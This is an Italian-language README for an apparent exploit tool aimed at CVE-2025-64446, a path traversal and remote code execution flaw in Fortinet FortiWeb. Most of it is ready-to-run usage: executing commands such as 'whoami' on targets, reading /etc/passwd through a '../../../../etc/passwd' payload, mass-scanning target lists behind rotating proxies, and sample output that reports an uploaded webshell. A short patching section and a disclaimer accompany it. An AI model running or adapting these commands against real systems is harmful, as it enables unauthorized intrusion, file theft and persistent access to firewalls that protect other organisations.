
Strumento di ricerca sulla sicurezza per rilevare e testare CVE-2025-64446 (vulnerabilità RCE di Path Traversal di FortiWeb)
Uno strumento di ricerca sulla sicurezza per rilevare e testare la vulnerabilità CVE-2025-64446 in Fortinet FortiWeb Web Application Firewall (WAF). Questa vulnerabilità critica zero-day di path traversal è stata attivamente sfruttata in natura e consente a utenti malintenzionati non autenticati di bypassare i controlli di sicurezza ed eseguire codice arbitrario.
Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e scopi educativi. L'accesso non autorizzato a sistemi informatici è illegale. Utilizzare questo strumento solo su sistemi di cui si è proprietari o per i quali si dispone di autorizzazione scritta esplicita per il test.
CVE-2025-64446 è una vulnerabilità critica zero-day di path traversal in Fortinet FortiWeb WAF che è stata attivamente sfruttata in natura. Questa vulnerabilità consente a utenti malintenzionati non autenticati di bypassare i controlli di sicurezza tramite attacchi di path traversal, potenzialmente portando all'esecuzione remota di codice, all'accesso a file di configurazione e al compromesso completo del sistema.
Punteggio CVSS: 9.8 (Critico)
Stato: Attivamente sfruttato in natura
CISA KEV: Aggiunto al catalogo delle vulnerabilità note sfruttate
Patch: FG-IR-25-910
Prodotto affetto: Fortinet FortiWeb WAF
# Clona il repository
git clone https://github.com/AN5I/cve-2025-64446-fortiweb-exploit.git
cd cve-2025-64446-fortiweb-exploit
# Installa le dipendenze
pip install -r requirements.txt
# Rendi gli script eseguibili (opzionale)
chmod +x cve_2025_64446_fortiweb_exploit.py
chmod +x cve_2025_64446_poc.py
# Scarica gli script
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_fortiweb_exploit.py
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_poc.py
# Installa le dipendenze
pip install requests
# Singolo target
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com
# Esegui comando personalizzato
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -c "whoami"
# Multipli target da file
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json
# Con threading per scansione più veloce
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -t 5
# Output verbose per debugging
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -v
# Proxy singolo
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com --proxy http://proxy:port
# Multipli proxy da file
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt
# Test POC base
python3 cve_2025_64446_poc.py -u http://target.com
# Test file specifico
python3 cve_2025_64446_poc.py -u http://target.com -f etc/passwd
# Output verbose
python3 cve_2025_64446_poc.py -u http://target.com -v
-u, --url URL del target
-f, --file File contenente URL dei target (uno per riga)
-c, --command Comando da eseguire (default: id)
-t, --threads Numero di thread (default: 1)
-o, --output File di output (default: uknf_fortiweb_results.json)
-v, --verbose Abilita logging verbose
--proxy URL del proxy (es., http://127.0.0.1:8080)
--proxy-list File contenente URL dei proxy (uno per riga)
Lo script genera un file JSON con risultati dettagliati:
{
"target": "http://target.com",
"timestamp": "2025-11-21T00:25:40.123456",
"fortiweb_detected": true,
"vulnerable": true,
"path_traversal_successful": true,
"config_file_read": true,
"webshell_uploaded": true,
"command_executed": "id",
"output": "uid=1000(user) gid=1000(user)...",
"vulnerable_payload": "../../../../etc/passwd"
}
Se stai utilizzando FortiWeb WAF:
Applicare immediatamente gli aggiornamenti di sicurezza:
# Controlla la versione corrente
show system status
# Aggiorna all'ultima versione
execute upgrade <firmware-file>
Segmentazione di rete:
Indurimento della configurazione:
Requisiti CISA:
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com
# Crea file dei target
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt
# Esegui scansione
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com -c "uname -a"
# Proxy singolo
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com --proxy http://127.0.0.1:8080
# Multipli proxy da file
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt
# POC base
python3 cve_2025_64446_poc.py -u https://example.com
# Test file specifico
python3 cve_2025_64446_poc.py -u https://example.com -f etc/passwd
I contributi sono benvenuti! Sentiti libero di inviare una Pull Request.
git checkout -b feature/AmazingFeature)git commit -m 'Add some AmazingFeature')git push origin feature/AmazingFeature)Se incontri problemi o hai suggerimenti, apri un issue su GitHub.
Questo progetto è concesso in licenza MIT - vedi il file LICENSE per i dettagli.
Se trovi utile questo strumento, considera di dargli una stella su GitHub!
Questo strumento è fornito esclusivamente per scopi educativi e test di sicurezza autorizzati. Gli autori non sono responsabili per qualsiasi uso improprio o danno causato da questo programma. Gli utenti sono responsabili di assicurarsi di avere la dovuta autorizzazione prima di testare qualsiasi sistema.
Se trovi utile questo strumento e desideri supportare il progetto:
Bitcoin (BTC):
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv
Ethereum (ETH):
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7
Grazie per il tuo supporto! 🙏